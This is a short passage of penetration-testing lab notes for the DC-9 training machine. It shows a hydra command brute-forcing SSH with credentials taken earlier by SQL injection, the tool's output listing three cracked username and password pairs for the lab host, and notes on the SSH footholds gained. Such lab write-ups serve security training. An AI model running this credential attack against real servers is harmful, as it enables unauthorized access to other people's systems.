Brute Force Attack
A total of 17 credential has been exfiltrated from the SQL injection. Validating them against the target SSH server.
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ hydra -L ./users.txt -P ./passwords.txt -I -t 64 ssh://$IP
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-03 00:49:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 289 login tries (l:17/p:17), ~5 tries per task
[DATA] attacking ssh://192.168.207.209:22/
[22][ssh] host: 192.168.207.209 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.207.209 login: janitor password: Ilovepeepee
[22][ssh] host: 192.168.207.209 login: chandlerb password: UrAG0D!
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-07-03 00:50:003 valid credentials identified;
joeyt:Passw0rdjanitor:Ilovepeepeechandlerb:UrAG0D!
SSH
/Play/DC-9/3-Exploitation/attachments/{52B1A75D-1799-4F52-9997-CEDA10253C6C}.png)
Initial Foothold established to the dc-9(192.168.207.209) host as the joeyt user via SSH
/Play/DC-9/3-Exploitation/attachments/{384196A5-8525-4D8E-A62D-0485D064278B}.png)
Initial Foothold established to the dc-9(192.168.207.209) host as the janitor user via SSH
/Play/DC-9/3-Exploitation/attachments/{1AC5FEFB-CCC2-44F9-B704-17D5F5C5C0CC}.png)
Initial Foothold established to the dc-9(192.168.207.209) host as the chandlerb user via SSH